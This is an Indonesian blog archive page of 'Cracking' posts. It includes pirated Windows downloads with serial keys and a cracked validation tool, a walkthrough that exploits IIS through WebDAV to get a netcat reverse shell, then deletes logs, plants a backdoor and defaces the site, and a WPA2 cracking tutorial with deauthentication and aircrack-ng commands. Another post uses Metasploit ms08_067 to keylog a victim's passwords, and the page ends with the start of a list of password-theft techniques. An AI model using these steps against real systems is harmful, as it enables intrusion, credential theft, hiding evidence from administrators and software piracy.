Tampilkan postingan dengan label Cracking. Tampilkan semua postingan
Tampilkan postingan dengan label Cracking. Tampilkan semua postingan

Selasa, September 11, 2012

Windows 8 traspormation pack 6



Windows 8 Transformation Pack 6 adalah paket transformasi lengkap yang akan membuat PC anda terlihat menggunakan system operasi Windows 8. Windows 8 Transformation Pack 6 ini dapat digunakan untuk semua system operasi dari Windows XP, Windows Vista, dan Windows 7.
Requirements:
· NET Framework 2.0 - Required for system files transformation in Windows XP/Server 2003 x64 Editions Only
· NET Framework 4.5 - Required for Windows 8 features like User Tile/Metro UI Desktop/Auto-colorization

What's New in This Release: [ read full changelog ]
· Added Windows 8 RTM wallpapers
· Configured Aero frame UI, Metro Desktop UI and Aero's auto-colorization to be used by default if applicable
· Improved Segoe fonts family installation code for better compatibilities
· Updated Metro Inspirat theme with improved start orb and few adjustments
· Updated Newgen's start screen background to Windows 8 RTM's default
· Updated Segoe fonts family from Windows 8 RTM
· Updated TrueTransparency Aero skin rebuilt from Windows 8 RTM resources
· Updated Windows 8's Explorer toolbar layout configuration
· Updated Windows 8 theme for Windows 7 by wango911 with customized theme files
· Updated system files resources found in Windows 8 RTM
· Boot Screen (Windows XP)
· Logon screen background
· Navigation buttons
· Network tray icons
· Shell icons
· Shell pane background
· Shutdown/Logoff/Theme dialogs (Windows XP)
· Start button/orb
Semoga bermanfaat, ^_^
Link Download
/files/applicationimages/download.gif 
(47 Mb)
Password : www.gigapurbalingga.com
 
Sumber :
/files/applicationimages/2_computers.gif


Windows XP SP3 Black Edition

   Pada kesempatan kali ini saya akan share Free Download Windows XP SP3  Black Edition Terbaru | Download Windows XP SP3  Black Edition Full Version 2012 | Free Download Windows XP SP3 Black Edition Full Version 2012 | Windows XP SP3 Black Edition Full Version 2012 | Windows XP SP3 Black Edition Terbaru 2012 | Download Windows Xp Pro SP3 - Black Edition ISO | Download Windows XP Black Edition With SP3 Free | Windows Xp Sp3 Black Edition Full Download - Windows XP merupakan salah satu produk sukses yang diluncurkan microsoft. Hal ini terbaukti masih banyaknya pengguna XP terutama Windows XP SP3 Black Edition Terbaru Full Version 2012 yang merupakan versi editor dimana nantinya disertai beberapa aplikasi dan driver tambahan. Dengan Windows XP SP3 Black Edition Terbaru Full Version 2012 anda akan dimudahkan dalam proses instalasi karena tidak dipersulit dengan driver. Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012

Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012




Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012


Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012


Feature Windows XP SP3 Black Edition Terbaru Full Version 2012
  • Windows XP Powertoy - ClearType Tuner v1.01.
  • Windows XP Powertoy - Alt-Tab Replacement v1.0.
  • Windows User Profile Hive Cleanup Service v1.6g.
  • Microsoft BitLocker To Go Reader v1.0 (KB970401).
  • Windows Feature Pack for Storage v1.0 (KB952013).
  • Windows XP exFAT file system driver update package v1.0 (KB955704).
  • Windows XP GDI+ Detection Tool v1 (KB873374).
  • Windows XP QFEcheck v6.2.29.0.
  • Microsoft Windows Browser Choice (KB976002 v5).
  • Windows Genuine Advantage Validation v1.9.42.0 (KB892130) - Cracked Version.
  • 7-Zip v9.20.
  • Open Command Prompt ****l Extension v2.1.0.
  • HashCheck ****l Extension v2.1.11.
  • Unlocker v1.9.1.
  • STDU Viewer v1.5.647.
  • Paint.NET v3.5.8.
  • Java SE Runtime Environment (JRE) v6 Update 26.
  • Flash Player ActiveX Control v10.3.181.26.
  • Shockwave Player v11.5.9.626.
  • Microsoft Silverlight v4.0.60531.0.
  • Microsoft DirectX v9.29.1962.
  • Microsoft .NET Framework v1.1 SP1, v2.0 SP2, v3.0 SP2, v3.5 SP1, v4
  • Client, v4 Extended.
  • Microsoft Visual C-family v1, v7, v8, v9, v10, (v2, v3, v4, v5, v6 are
  • already included in Windows XP Service Pack 3).
  • Microsoft Visual Basic v1, v2, v3, v4, v7+, (v5, v6 are already included in Windows XP Service Pack 3



Untuk download silahkan pilih salah satu link Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012 :


Sumber :

Serial Number Windows XP SP3 Black Edition Terbaru Full Version 2012 :
  • RPYPK-KC86X-PMFB4-GXGQW-4H7RR
  • B77QF-DP27W-4H68R-72B48-78RPD 

Senin, September 10, 2012

Otak-atik user melalui CMD (DOS)

Sekarang sudah jarang para pengguna computer mengenal adanya perintah yang diberikan kepada computer berupa perintah teks yang langsung dieksekusi oleh computer itu sendiri yang disebut dengan perintah DOS (DOS Command).
Misalkan saja untuk melihat isi suatu drive harddisk berupa file-file, kita harus mengetikan perintah dir supaya file-file yang ada pada drive bisa ditampilkan. Beda bukan dengan saat ini yang sudah dikenal dengan teknologi system operasi windows yang semuanya dapat dilakukan dengan mudah, yaitu hanya dengan explorer, semua file pada drive yang ditentukan dapat terlihat dengan jelas.
Diantara perintah-perintah DOS tersebut ada sebuah perintah yang juga sangat bermanfaat untuk menampilkan akun para pengguna computer serta mengganti password akun tersebut pada windows, yaitu perintah NET (huruf capital hanya mempertegas bahwa tulisan itu adalah sebuah perintah), dalam penggunaannya boleh dengan huruf besar atau kecil.
Sebagai informasi bahwa praktek mengubah password untuk user windows ini saya menggunakan windows xp service pack 2 (sp2) dan perintah ini hanya dapat dilakukan oleh seorang administrator, dengan begitu maka untuk melakukan perintah ini harus login menggunakan akun administrator sedangkan bila login menggunakan user yang lebih rendah haknya dari administrator maka perintah tersebut akan tidak berfungsi untuk mengubah password namun perintah tersebut hanya bisa digunakan untuk melihat user yang ada.
Berikut ini perintah untuk melihat dan mengubah password user yang ada pada windows xp sp2.
Pertama jalankan command prompt dengan cara klik Start-All Programs-Accessories-Command Prompt sehingga muncul jendela berwarna hitam seperti terlihat pada gambar berikut.

 

Pada command prompt ketikan perintah sebagai berikut : net user ENTER sehingga hasilnya seperti gambar berikut.

 

Dari user-user yang ada, anda bisa membuat sebuah password untuk user yang ada dan dapat juga menghapus password yang ada atau mengganti password yang ada dari setiap user yang ada.
Membuat password dan Mengubah Password
Untuk membuat password pada masing-masing user dapat dilakukan dengan memberikan perintah berikut ini.
Net user {nama user} {password}
Contoh : net user guest 1234
Penjelasannya : Net user adalah perintah, kemudian guest adalah nama user dan 1234 adalah password, jadi perintah di atas adalah membuat atau mengubah password bagi nama pengguna Guest. Perhatikan gambar berikut.

 

Setelah menekan ENTER maka muncul pesan “The Command Completed Successfully” yang menyatakan bahwa perintah pembuatan password untuk akun Guest sudah berhasil dengan baik. Untuk membuktikan bahwa akun Guest sudah menggunakan password 1234 coba klik menu Start-Log Off-Switch User dan gunakan akun Guest untuk login, maka windows akan meminta anda memasukan password karena anda sudah membuatnya pada command prompt. Ketik 1234 kemudian tekan ENTER untuk masuk ke akun Guest.

 

Setelah membuat atau mengubah password, tentu kita juga harus bisa menghapus password tersebut apabilah sudah tidak dibutuhkan lagi. Lalu bagaimana caranya ikuti langkah berikut ini.
Menghapus password
Akun Guest yang sudah dibuatkan passwordnya melalui command prompt, sekarang kita akan menghilangkannya atau menghapusnya, caranya dengan perintah berikut :
Net user guest * ENTER

 

Setelah menekan enter maka muncul pesan “Type a password for the user :” tekan ENTER saja karena kita tidak ingin membuat password melainkan menghapus password yang ada.
Berikutnya adalah pesan “Retype the password to confirm :” juga tekan ENTER saja karena tidak ada password sehingga muncul pesan yang terakhir “The Command Complited Successfully” yang berarti bahwa perintah menghilangkan password tersebut sudah berhasil dilakukan.
Perintah menghapus password di atas juga dapat digunakan untuk membuat sebuah password baru. Apabila hendak membuat password baru dengan perintah di atas maka pada saat muncul pesan “Type a password for the user :” maka tulis atau ketikan password untuk user tersebut (contoh : 1234) dan tekan ENTER, kemudian muncul pesan kedua “Retype the password to confirm :” maka ketiklan sekali lagi password (contoh : 1234) kemudian tekan ENTER.

Source : 

Hacking dengan IIS

Pada kesempatan kali ini saya akan share tentang hacking dengan IIS.
Ok. jangan berpanjang lebar lets go>>>

1) Pendahuluan

Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!

2) Adanya Celah Keamanan

Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J

3) Mengeksploitasi celah keamanan dan Mengendalikan webserver

Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]
Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666
Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>
Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.

4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?

Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.

5) Kesimpulan

Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.
Semoga bermanfaat.

Sumber :

binushacker.net
ozcorp.blogspot.com

Minggu, September 09, 2012

Wi-Fi Cracking With Backtrack

Sekarang saya iseng-iseng kembali share tentang cracking Wi-Fi  WPA2 dengan menggunakan backtrack 5 saya terinspirasi karena sekarang Pasti begitu banyak dan sangat mudah mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)

Download BackTrack 5 Disini:








Download Wordlist John The Ripper Disini:


Download Wordlist

Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install

Wireless Hacking Using BackTrack 5
Oke mari kita lanjutkan:
1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:

root@binushacker:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)
2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:

root@binushacker:~# airodump-ng mon0

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless
3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2
CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:

root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#


5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161

6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904
[00:00:00] 48 keys tested (489.60 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu: W!R3L3$$PWD

7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904
[00:00:22] 11484 keys tested (534.50 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD
Untuk lebih detailnya, silakan lihat video berikut:


Sumber :
binushacker.net
ozcorp.blogspot.com

Keylogger Dengan Metasploit

   Assalamu`alaikum sekarang saya akan mengshare keylogger dengan metasploit dan cukup berguna untuk merekam kegiatan target di komputernya,Btw mengapa judulnya kayak gini (Merekam ketukan keyboard target tanpa menyentuh komputernya – keylogger canggih), iyah betul judulnya sesuai kok sama kenyataannya,,yang biasanya ente kalo mau ngerjain temen buat ngerekam keyboard target pake keyloger dengan harapan si korban masukin email dan lain sebagainya.. Ente mondar mandir berkali kali kekomputer target buat naro keylogger dengan berbagai macam alesan,,entah numpang mindahin file or apalah buat naro sebuah keylogger aja,,alesan yang pertama bos minjem laptop luh bos buat mindahin data-data, abis itu seminggu kemudian balik lagi pake alesan bos data-data w kemaren ketinggalan dilaptop luh. Gw minjem lagi dong dengan harapan password email or facebook temennya udah kecantol di jebakan keylogger miliknya,,tapi tutorial kali ini, gak perlu repot2 kok, gak perlu mondar mandir dua kali..Tutorial kali ini kita exploit rekaman keyboard tanpa menyentuh laptop korbannya…dengan modal kita tau ipaddress korban aja udah beres,,Linux teaa..
OK deh langsung aja, tanpa basa basi..
Peralatannya adalah :
  1. Angry IP Scanner (Buat scanning ipaddress)
  2. Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian)
  3. Metasploit (Sangat penting buat exploitnya)
1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ajeee…lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :


nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:


liat deh ituhh,,ternyata doi pake windows XP,,hehhehe,,hajar bleeeehhhhhh….sampe keakar2nya bikin intall ulang dalem hitungan detik…Ouuppppsss jangan dungggsss, kan ini tutorialnya tentang ngerekam keyboard buat dapetin password,,hhehheh,,,Oiya yaaaa…lanjuttt blleeehhh..

3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik “msfgui” setelah kebuka dan Start, pilih “ms08_067_netapi” di Exploit>windows>smb> , seperti gambar berikut ini:


4. Maka akan keluar jendela pilihan OS targetnya, pilihlah “Automatic Targeting”, seperti gambar berikut ini:


5. Lalu scrool kebawah dan pilih “Meterpreter>bind_tcp” , seperti gambar berikut ini:


6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom “RHOST” , seperti gambar berikut ini:

 
Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

7. Maka akan keluar jendela seperti ini di tab “Session”, seperti gambar dibawah ini:


8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:


9. Maka akan keluar path tempat penyimpanan log nya berupa format “txt” dikomputer kita, seperti gambar berikut ini:

 
coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeeetuh filenya, seperti gambar berikut ini:


10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini broo:


Kayaknya kena tuh,,,hehhehehe,,,biasanya kalo korban ngetik di keyboard Ctrl maka di file lognya <Ctrl>, kalo dia mencet Enter <Return>, kalo mencet tab <Tab> dan lain sebagainya…OK kelar deh,,ya kan bener kan gak perlu mondar mandir nyentuh komputer korbannya buat ngedapetin sesuatu yg ente mau,,,hhhwhwhhw,,pake metasploit lebih sloooowww,,sambil ngopi+ngeroko filter juga OK,,gak perlu tergesah gesah dengan tampang pucat mbrunyammm,,,hwhhhwh,,,OK lah kalo bgitu ane pamitan dulu, n 
tunggu exploit-exploit berikutnya dari si logo PINGUIN….

Origin Source:   
Disini By Andi Susilo

Mirror Source: 

Shared by:

Cara Cracking Password

  Ok sekarang saya akan sedikit menceritakan tentang bagaimana cara melakukan pembajakan password/cracking password.
  Ada banyak cara untuk mendapatkan suatu password / membajak password / crack password. Beberapa diantaranya tidak membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan paling sering digunakan :

[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan FiturBrowser
[9]. Googling
[10]. Phising

[1]. Social Engineering

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai ‘penipuan’ Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban.
Social Engineering merupakan seni ‘memaksa’ orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja ‘pemaksaan’ yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban. Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya, tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.
